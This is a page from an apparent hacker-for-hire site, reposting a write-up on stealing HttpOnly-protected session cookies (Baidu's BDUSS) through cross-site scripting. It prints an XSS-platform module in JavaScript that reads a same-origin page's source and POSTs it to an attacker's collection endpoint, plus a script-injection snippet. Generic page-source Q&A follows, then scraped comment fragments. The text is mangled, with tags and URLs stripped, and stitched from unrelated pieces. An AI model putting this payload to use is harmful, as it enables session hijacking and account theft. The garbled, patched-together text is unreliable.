黑客24小时在线接单网站

黑客在线接单,网站入侵,渗透测试,渗透网站,入侵网站

2022年07月08日 20:02:16

xss指定获取页面源码(xss指定获取页面源码GET)

本文目录一览:

如何通过 XSS 获取受 http-only さcookie

该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。

02.jpg

这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

code 区域

var u = ';id={projectId}';

var cr;

if (document.charset) {

cr = document.charset

} else if (document.characterSet) {

cr = document.characterSet

};

function createXmlHttp() {

if (window.XMLHttpRequest) {

xmlHttp = new XMLHttpRequest()

} else {

var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');

for (var n = 0; n MSXML.length; n++) {

try {

xmlHttp = new ActiveXObject(MSXML[n]);

break

} catch(e) {}

}

}

}

createXmlHttp();

xmlHttp.onreadystatechange = writeSource;

xmlHttp.open("GET", "", true);

xmlHttp.send(null);

function postSource(cc) {

createXmlHttp();

url = u;

cc = "mycode=" + cc;

xmlHttp.open("POST", url, true);

xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xmlHttp.setRequestHeader("Content-length", cc.length);

xmlHttp.setRequestHeader("Connection", "close");

xmlHttp.send(cc)

}

function writeSource() {

if (xmlHttp.readyState == 4) {

var c = new postSource(xmlHttp.responseText)

}

}

由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。

我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:

code 区域

titlewooyun.org/title

p超威蓝猫@wooyun.org/p

script src=;/script

如何通过java,javascript获得某一指定URL的网页源码?

javascript获取网页源码,测试了能通过的,你试下!

你把 l t ; g t;的空格删了,因为百度不允许那些字符。

html

head

meta http-equiv="Content-Type" content="text/html; charset=gb2312" /

titletest/title

/head

body

关于百度页面;p=irol-homeprofile源码内容如下:br /

div id="t1"/div

script type="text/javascript"

function createXmlHttpRequest()

{

try {return new XMLHttpRequest();}

catch(e)

{

return new ActiveXObject("Microsoft.XMLHTTP");}

}

var xmlHttp = createXmlHttpRequest();

xmlHttp.open("get", ";p=irol-homeprofile",false);

xmlHttp.send();

if(xmlHttp.readyState == 4 xmlHttp.status == 200)

{

str = xmlHttp.responseText;//str即为返回的html内容

var str1 = new RegExp("","g");

var str2 = new RegExp("","g");

var str3 = new RegExp("\r","g");

str=str.replace(str2," l t ;"); //把空格删了,百度会把那些字符替换掉,不得已打空格

str=str.replace(str1," g t ;"); //把空格删了,百度会把那些字符替换掉,不得已打空格

str=str.replace(str3,"br /");

document.getElementById("t1").innerHTML = str;

}

/script

/body

/html

JavaScript 如何读取某网页的源码?

可以使用parent.网页所在窗口的名字.doucment.body.innerHTML属性来读取网页主体中的代码,但是要获得整个网页的源码可能只使用JavaScript是办不到的.

标签:xss指定获取页面源码 

作者:hacker , 分类:入侵网站 , 浏览:47 , 评论:4

  • 评论列表:
  •  萌懂疚爱
     发布于 2022-07-08 21:48:29  回复该评论
  • 的代码,但是要获得整个网页的源码可能只使用JavaScript是办不到的.
  •  只影笑惜
     发布于 2022-07-09 02:43:40  回复该评论
  • tpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。我
  •  痴妓并安
     发布于 2022-07-09 03:25:05  回复该评论
  • replace(str3,"br /"); document.getElementById("t1").innerHTML = str; } /script /body /htmlJavaScript 如何读取某网页的源码?可以使用parent.网页所在窗口的名字.douc
  •  莣萳绿脊
     发布于 2022-07-08 23:46:38  回复该评论
  • 面;p=irol-homeprofile源码内容如下:br / div id="t1"/div script type="text/javascript" function createXmlHttpRequest(

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.